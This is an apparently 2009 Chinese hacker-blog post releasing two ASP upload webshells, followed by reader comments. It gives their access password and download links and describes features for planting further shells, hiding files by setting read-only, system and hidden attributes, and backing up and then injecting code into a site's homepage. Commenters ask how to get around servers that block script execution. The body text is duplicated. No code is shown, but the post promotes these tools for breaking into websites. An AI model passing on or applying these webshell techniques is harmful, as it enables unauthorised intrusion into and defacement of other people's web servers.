发布2个特殊上传小马
作者:admin 日期:2009-12-13
1,dao-upload1.asp

这个小马是我组装的,利用的化境上传组件,不依赖fso,打开方式是dao-upload1.asp?pass=daogehao,O(∩_∩)O。小马的一个特点就是上传之后它会自动打开上传的文件,如果这个上传的文件有运行参数,那么可以在后面的框中输入,比如shell.asp?goaction=login,那么就在后面输入?goaction=login,上传之后就可以自动打开了。
2,dao-upload2.asp

另外一个小马,这是一个朋友给我的,解密了一下,也是很有意思的。这个上传是依赖fso传的,打开方式也是dao-upload2.asp?pass=daogehao。这个马的特点就是一运行就修改自身的属性为只读、系统、隐藏。如果上传文件,那么在路径中输入文件路径,比如M:\加密解密\test\test.asp,之后在下面的第一个textarea中输入代码,然后点击save就行了,同样会隐藏你上传的这个文件;另外一个功能是这个马具有备份和修改首页的功能,如果文件为index.html、index.asp等默认的首页文件,那么上面的textarea留空,在下面的那个textarea中输入代码,第一次就自动备份这个首页文件,然后在末尾添加这个代码,这个代码是又第二个input觉得的,比如第二个input为“</td>”,那么代码就为</td>第二个textarea内容</td>。其它的就自己摸索下吧,挺有意思。
2个文件下载地址:
点击下载此文件

这个小马是我组装的,利用的化境上传组件,不依赖fso,打开方式是dao-upload1.asp?pass=daogehao,O(∩_∩)O。小马的一个特点就是上传之后它会自动打开上传的文件,如果这个上传的文件有运行参数,那么可以在后面的框中输入,比如shell.asp?goaction=login,那么就在后面输入?goaction=login,上传之后就可以自动打开了。
2,dao-upload2.asp

另外一个小马,这是一个朋友给我的,解密了一下,也是很有意思的。这个上传是依赖fso传的,打开方式也是dao-upload2.asp?pass=daogehao。这个马的特点就是一运行就修改自身的属性为只读、系统、隐藏。如果上传文件,那么在路径中输入文件路径,比如M:\加密解密\test\test.asp,之后在下面的第一个textarea中输入代码,然后点击save就行了,同样会隐藏你上传的这个文件;另外一个功能是这个马具有备份和修改首页的功能,如果文件为index.html、index.asp等默认的首页文件,那么上面的textarea留空,在下面的那个textarea中输入代码,第一次就自动备份这个首页文件,然后在末尾添加这个代码,这个代码是又第二个input觉得的,比如第二个input为“</td>”,那么代码就为</td>第二个textarea内容</td>。其它的就自己摸索下吧,挺有意思。
2个文件下载地址:
点击下载此文件以下说明属本文之一部分:
转载请保持完整并注明:转自 金刀客[www.daokers.com]
评论: 9 | 引用: 0 | 查看次数: -
论坛上的压缩包损坏了 刀哥上传在博客上边吧
admin 于 回复
要求太多了吧
刀哥。。 不知道你那个 利用的化境上传组件,不依赖fso的小马,能够改成自定义路径的吗?或者改成上传到上一个目录../ 之类的 经常遇到,上传的地方上传上去shell但是没有脚本执行权限,但是支持上传,谢刀哥,希望能修改下。。
admin 于 回复
恩,看到你的帖子后修改了一个,你去看看http://forum.daokers.com/read.php?tid=988
地址是这样的:
.../upload1.asp?pass=daogehao
上传文件不能执行 提示是否下载
admin 于 回复
.../upload1.asp?pass=daogehao
上传文件不能执行 提示是否下载
那说明没权限,不管小马的事
用第一个上传东西怎么不执行啊?
admin 于 回复
发地址看看
请问我要如何才能换成自己的密码?
admin 于 回复
这也问我啊
自己看看源码吧
自己看看源码吧
拿走了膜拜 到今天我才知到小马才能这样用! 谢谢
这个我喜欢···
金刀客 于 回复
:-D,拿就帮俺顶顶
虽小功能强大
金刀客 于 回复 

发表评论
上一篇
下一篇

相关日志:
文章来自: 





回复
在博客上发不了链接。。论坛帖子的最后一个回复。。我上传截图了。。 真的不能打开。。压缩包损坏。。 确实急用啊。。 刀哥~~ thanks